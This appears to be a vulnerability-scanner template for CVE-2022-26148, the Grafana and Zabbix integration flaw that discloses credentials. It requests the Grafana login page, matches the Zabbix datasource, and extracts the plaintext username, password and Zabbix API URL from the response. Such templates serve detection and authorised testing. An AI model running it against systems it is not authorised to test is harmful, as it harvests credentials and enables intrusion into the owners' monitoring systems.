id: CVE-2022-26148

info:
  name: Grafana & Zabbix Integration - Credentials Disclosure
  author: Geekby
  severity: critical
  tags: grafana

http:
  - method: GET
    path:
      - "{{BaseURL}}/login?redirect=%2F"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"password":"(.*?)"'
          - '"username":"(.*?)"'
        condition: and

      - type: word
        part: body
        words:
          - '"zabbix":'
          - '"zbx":'
          - "alexanderzobnin-zabbix-datasource"
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - '"password":"(.*?)"'
          - '"username":"(.*?)"'
          - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php'